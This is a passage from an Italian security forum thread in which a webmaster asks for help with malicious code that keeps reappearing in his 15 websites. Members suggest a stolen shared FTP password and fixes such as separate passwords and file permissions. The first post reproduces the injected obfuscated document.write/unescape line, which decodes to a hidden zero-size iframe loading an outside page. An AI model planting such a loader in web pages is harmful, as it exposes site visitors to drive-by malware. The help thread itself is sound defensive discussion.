Logo by Irenicus giovedì 24-mag-12 10:48


RaulKen.It :: Leggi il Topic - codice maligno nelle mie pagine web...help me!
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

codice maligno nelle mie pagine web...help me!
Vai a pagina 1, 2  Successivo
 
Nuovo Topic   Rispondi    Indice del forum -> Informatica Avanzata - Hacking e Sicurezza
Precedente :: Successivo  
Autore Messaggio
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Sab Ott 27, 2007 12:11 pm    Oggetto: codice maligno nelle mie pagine web...help me! Rispondi citando

Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));



tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
Spero che qualcuno possa aiutarmi! Saluti Antonello
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Sab Ott 27, 2007 2:12 pm    Oggetto: Rispondi citando

è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti.
_________________
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Sab Ott 27, 2007 3:10 pm    Oggetto: Rispondi citando

gizasmc ha scritto:
è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti.


ieri ho cambiato la psw ftp, mi è stata comunicata via telefono! poi ho formattato il pc, poi ho rinserito i miei siti via ftp!...ma stamattina ....la stessa cosa! Non so cosa fare! Grazie cmq per l'aiuto! Se hai in mente qualke soluzione, fammi sapere, te ne sono grato!
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Sab Ott 27, 2007 3:21 pm    Oggetto: Rispondi citando

a chi ti appoggi come hosting? forse il problema è su quei server, hai parlato del problema a loro?
_________________
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Sab Ott 27, 2007 3:31 pm    Oggetto: Rispondi citando

ho parlato del problema con loro! anzi sono andato direttamente nei loro uffici, tra l'altro i tecnici sono anche dei miei amici ed tale problema è stato riscontrato solo all'interno del mio HOst! tutti gli altri migliaia di domini presenti suil loro server non hanno subito alcun danno! io credo sia un virus che invio io via ftp!
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Sab Ott 27, 2007 3:47 pm    Oggetto: Rispondi citando

opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web!
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Lun Ott 29, 2007 2:29 pm    Oggetto: Rispondi citando

cuba74 ha scritto:
opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web!
e ti hanno fregato per questo... 15 con un colpo solo, non sei stato tu tramite ftp.
_________________
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Lun Ott 29, 2007 2:59 pm    Oggetto: Rispondi citando

gizasmc ha scritto:
cuba74 ha scritto:
opps scusami! cmq si! ho la stessa psw per tutti i miei siti, o meglio ho un'unica psw attraverso la quale accedo al mio intero spazio web!
e ti hanno fregato per questo... 15 con un colpo solo, non sei stato tu tramite ftp.


cosa mi consigli? adesso ho tutti i miei siti off line! credi che basti cambiare nuovamente le psw....e magari attribuirne una ad ogni dominio? secondo te queste "iniezioni maligne" avvengono via ftp? dammi un tuo parere! grazie!
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Lun Ott 29, 2007 3:04 pm    Oggetto: Rispondi citando

secondo me è una cosa logica dare una pass diversa ad ogni dominio, se lo facevi prima forse non passavi tutto questo.
non so io proverei a svuotare i domini cambiare pass e prima di reinserire i siti ricontrollare le pagine per eliminare i codici che non conosci e sai di non aver inserito tu.
_________________
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Lun Ott 29, 2007 3:25 pm    Oggetto: Rispondi citando

gizasmc ha scritto:
secondo me è una cosa logica dare una pass diversa ad ogni dominio, se lo facevi prima forse non passavi tutto questo.
non so io proverei a svuotare i domini cambiare pass e prima di reinserire i siti ricontrollare le pagine per eliminare i codici che non conosci e sai di non aver inserito tu.


ok! grazie! provvederò a fare quanto mi hai detto, ti farò sapere! cmq sai se esiste un metodo per evitare la sovrascrittura dei file via ftp?
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Lun Ott 29, 2007 3:53 pm    Oggetto: Rispondi citando

dipende da che linguaggio usi per fare i siti
_________________
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Lun Ott 29, 2007 4:17 pm    Oggetto: Rispondi citando

gizasmc ha scritto:
dipende da che linguaggio usi per fare i siti


io utilizzo esclusivamente html con qualche ritocco grafico in flash! basta così. I file che genero quindo sono tutti *htm e swf.
Torna in cima
Profilo Messaggio privato
cuba74
Nuovo del Forum
Nuovo del Forum


Registrato: Oct 27, 2007
Messaggi: 9

MessaggioInviato: Lun Ott 29, 2007 5:30 pm    Oggetto: Rispondi citando

cuba74 ha scritto:
gizasmc ha scritto:
dipende da che linguaggio usi per fare i siti


io utilizzo esclusivamente html con qualche ritocco grafico in flash! basta così. I file che genero quindo sono tutti *htm e swf.


scusami ancora! ma in un altro forum mi hanno detto che tutto ciò potrebbe essere causato da utilizzo di alcuni contatore free, i quali creano un buco nel sistema di protezione del server, io in realtà su un mio sito avevo inserito SchinyStat, mi sai dire qualkosa a riguardo?
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Lun Ott 29, 2007 5:33 pm    Oggetto: Rispondi citando

di base una cosa pratica è aprire il tuo client ftp accedere al sito selezionare il file e col tasto destro andare su proprietà/CHMOD, da li controlli i permessi di scrittura.
_________________
Torna in cima
Profilo Messaggio privato
gizasmc
Veterano del Forum
Veterano del Forum


Registrato: Jul 19, 2005
Messaggi: 2804
Località: cerco casa

MessaggioInviato: Lun Ott 29, 2007 5:37 pm    Oggetto: Rispondi citando

mai avuto problemi con quel tipo di contatore anche se non mi piace più usarlo. cmq è vero che alcuni "gadget" presi da servizi online possono creare questi problemi.
_________________
Torna in cima
Profilo Messaggio privato
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Informatica Avanzata - Hacking e Sicurezza Tutti i fusi orari sono GMT + 1 ora
Vai a pagina 1, 2  Successivo
Pagina 1 di 2

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group


PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Generazione pagina: 0.13 Secondi